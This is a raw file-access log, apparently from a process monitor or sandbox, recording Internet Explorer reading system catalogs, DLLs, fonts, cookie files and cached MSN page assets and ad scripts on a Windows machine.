11/3/2020 - 11:45:46.278Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~pl-PL~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~pl-PL~7.1.7601.16492.cat
11/3/2020 - 11:45:46.278Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~pt-PT~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~pt-PT~7.1.7601.16492.cat
11/3/2020 - 11:45:46.278Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~sv-SE~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~sv-SE~7.1.7601.16492.cat
11/3/2020 - 11:45:46.278Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~ru-RU~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~ru-RU~7.1.7601.16492.cat
11/3/2020 - 11:45:46.278Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~hu-HU~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~hu-HU~7.1.7601.16492.cat
11/3/2020 - 11:45:46.278Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~it-IT~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~it-IT~7.1.7601.16492.cat
11/3/2020 - 11:45:46.278Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~it-IT~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~it-IT~7.1.7601.16492.cat
11/3/2020 - 11:45:46.278Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~tr-TR~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~tr-TR~7.1.7601.16492.cat
11/3/2020 - 11:45:46.278Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~pl-PL~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~pl-PL~7.1.7601.16492.cat
11/3/2020 - 11:45:46.278Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~nb-NO~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~nb-NO~7.1.7601.16492.cat
11/3/2020 - 11:45:46.278Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\UIAutomationCore.dllUIAutomationCore.dll
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\locale.nls
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Globalization\Sorting\SortDefault.nlsSortDefault.nls
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\WindowsShell.ManifestWindowsShell.Manifest
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\8CS2PRM4.txt
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\stdole2.tlb
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E046BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E046BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\50D6B15D9F2DCE1EDBB0C098625FBE47_281AC807DE0FEF15F2CA9911FE760A9B50D6B15D9F2DCE1EDBB0C098625FBE47_281AC807DE0FEF15F2CA9911FE760A9B
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\50D6B15D9F2DCE1EDBB0C098625FBE47_281AC807DE0FEF15F2CA9911FE760A9B50D6B15D9F2DCE1EDBB0C098625FBE47_281AC807DE0FEF15F2CA9911FE760A9B
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\oleaccrc.dll
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\e151e5[1].gife151e5[1].gif
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\BB1kvzy[1].pngBB1kvzy[1].png
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\AAwBbg7[1].jpgAAwBbg7[1].jpg
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\AAv4RrG[1].jpgAAv4RrG[1].jpg
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\AAwGL0I[1].jpgAAwGL0I[1].jpg
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\BB8MKSg[1].pngBB8MKSg[1].png
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\BB8MIiC[1].pngBB8MIiC[1].png
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\b8-2f3a4c-4b5f58d3[1].cssb8-2f3a4c-4b5f58d3[1].css
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\~FontCache-System.dat~FontCache-System.dat
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\DOMStore\O7SUU5RP\www.msn[1].xmlwww.msn[1].xml
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\adswrappermsni[1].jsadswrappermsni[1].js
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\jquery-2.1.1.min[1].jsjquery-2.1.1.min[1].js
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\41-e73167-68ddb2ab[1].js41-e73167-68ddb2ab[1].js
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\~FontCache-FontFace.dat~FontCache-FontFace.dat
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\~FontCache-S-1-5-21-2148495166-3420019059-1286093062-1001.dat~FontCache-S-1-5-21-2148495166-3420019059-1286093062-1001.dat
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts\segoeui.ttf
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\c64c2a[1].woffc64c2a[1].woff
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\pt-BR\jscript9.dll.muijscript9.dll.mui
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\S4OWK0RR.txt
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\OLU3XFVE.txt
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts\times.ttf
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B45457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B45457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C775080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C775080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\024823B39FBEACCDB5C06426A8168E99_D14B1CE36D9D0F93A634A5E9E22B442B024823B39FBEACCDB5C06426A8168E99_D14B1CE36D9D0F93A634A5E9E22B442B
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\024823B39FBEACCDB5C06426A8168E99_D14B1CE36D9D0F93A634A5E9E22B442B024823B39FBEACCDB5C06426A8168E99_D14B1CE36D9D0F93A634A5E9E22B442B
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\tzres.dll
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\990861[1].svg990861[1].svg
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\M4DVBFFQ.txt
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\AA2JbD3[1].pngAA2JbD3[1].png
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\S5MKAZSW.txt
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\0SX9NXYL.txt
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\desktop.ini
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History\desktop.ini
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\ast[1].jsast[1].js
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\24-3b1d5e-68ddb2ab[1].js24-3b1d5e-68ddb2ab[1].js
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\chartbeat[1].jschartbeat[1].js
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\AA3jsXa[1].pngAA3jsXa[1].png
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\BBqgb7K[1].pngBBqgb7K[1].png
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\AAwGgve[1].jpgAAwGgve[1].jpg
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\AAgPBML[1].pngAAgPBML[1].png
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\MSNIdSync[1].jsMSNIdSync[1].js
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\br_msn_home_vitrine[1].jsbr_msn_home_vitrine[1].js
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD67423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD67423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A9E4F776657345B52012CE8E279D314C_9E5F079A21E9B5A16B5D6449033D0D0EA9E4F776657345B52012CE8E279D314C_9E5F079A21E9B5A16B5D6449033D0D0E
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A9E4F776657345B52012CE8E279D314C_9E5F079A21E9B5A16B5D6449033D0D0EA9E4F776657345B52012CE8E279D314C_9E5F079A21E9B5A16B5D6449033D0D0E
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5ABEDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5ABEDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\br_msn_home_vitrine.cfg[1].jsbr_msn_home_vitrine.cfg[1].js
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\aep-formats-20.14.0.min[1].jsaep-formats-20.14.0.min[1].js
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\59c177f5d970c300041220e2.tpl.min[1].js59c177f5d970c300041220e2.tpl.min[1].js
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\TaboolaCookieSyncScript[1].jsTaboolaCookieSyncScript[1].js
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE46BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE46BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\59c177f5d970c300041220e2[1].css59c177f5d970c300041220e2[1].css
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_C9FB72B5AE80778A08024D8B0FDECC6F6BADA8974A10C4BD62CC921D13E43B18_C9FB72B5AE80778A08024D8B0FDECC6F
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_C9FB72B5AE80778A08024D8B0FDECC6F6BADA8974A10C4BD62CC921D13E43B18_C9FB72B5AE80778A08024D8B0FDECC6F
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\58b810[1].gif58b810[1].gif
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F12703B35B1F82C21160A92376087C84_D65FD79591497596ED270B90105A4D42F12703B35B1F82C21160A92376087C84_D65FD79591497596ED270B90105A4D42
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F12703B35B1F82C21160A92376087C84_D65FD79591497596ED270B90105A4D42F12703B35B1F82C21160A92376087C84_D65FD79591497596ED270B90105A4D42
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\msn[1].htmmsn[1].htm
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\publishertag[1].jspublishertag[1].js
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\c08e43[1].jpgc08e43[1].jpg
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\pt-BR\KernelBase.dll.muiKernelBase.dll.mui
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msxml6r.dll
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\865070[1].jpg865070[1].jpg
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\8bd8bf[1].jpg8bd8bf[1].jpg
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\8adb60[1].jpg8adb60[1].jpg
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\undefined[1].pngundefined[1].png
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\784660[1].jpg784660[1].jpg
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\784659[1].jpg784659[1].jpg
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\784663[1].jpg784663[1].jpg
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\784658[1].jpg784658[1].jpg
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\async_usersync[1].htmasync_usersync[1].htm
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\beacon[1].jsbeacon[1].js
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\19O5P9C0.txt
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\8IS70EJY.txt
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_D93C575AD9E9AF9B95268A3CB953B5A1B398B80134F72209547439DB21AB308D_D93C575AD9E9AF9B95268A3CB953B5A1
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9915FBCE5ECE56452A09FB65EDE2FAD2_80F9A36DBD5FAAA38A8DED2B49FA41099915FBCE5ECE56452A09FB65EDE2FAD2_80F9A36DBD5FAAA38A8DED2B49FA4109
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9915FBCE5ECE56452A09FB65EDE2FAD2_80F9A36DBD5FAAA38A8DED2B49FA41099915FBCE5ECE56452A09FB65EDE2FAD2_80F9A36DBD5FAAA38A8DED2B49FA4109
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GRO8Z4YG.txt
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\D3LNK60R.txt
